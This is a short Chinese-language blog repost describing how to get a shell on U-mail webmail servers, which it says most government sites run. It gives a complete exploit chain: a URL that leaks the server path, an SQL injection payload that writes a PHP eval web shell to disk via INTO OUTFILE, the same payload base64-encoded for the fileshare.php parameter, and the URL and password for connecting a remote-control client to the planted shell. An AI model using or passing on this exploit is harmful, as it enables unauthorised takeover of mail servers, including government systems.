码迷,mamicode.com
首页 > Web开发 > 详细

大部分政府网站U-mail存在直接拿shell漏洞

时间:2016-10-01 22:19:31      阅读:231      评论:0      收藏:0      [点我收藏+]

标签:

大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址

技术分享

然后将 aa‘ union select 1,2,3,4,5,6,‘<?php eval($_POST1);?>‘,8,9,10,11,12,13,14 into outfile ‘D:/umail/WorldClient/html/saknc.php‘#用base64编译一下YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1QxKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRDovdW1haWwvV29ybGRDbGllbnQvaHRtbC9zYWtuYy5waHAnIw==然后 http://127.0.0.1/webmail/fileshare.php?file=加上上面编译的base64代码可直接写入shell saknc.php用菜刀连接 http://127.0.0.1/webmail/saknc.php 密码:shell 

大部分政府网站U-mail存在直接拿shell漏洞

标签:

原文地址:http://www.cnblogs.com/hackhyl/p/5926393.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!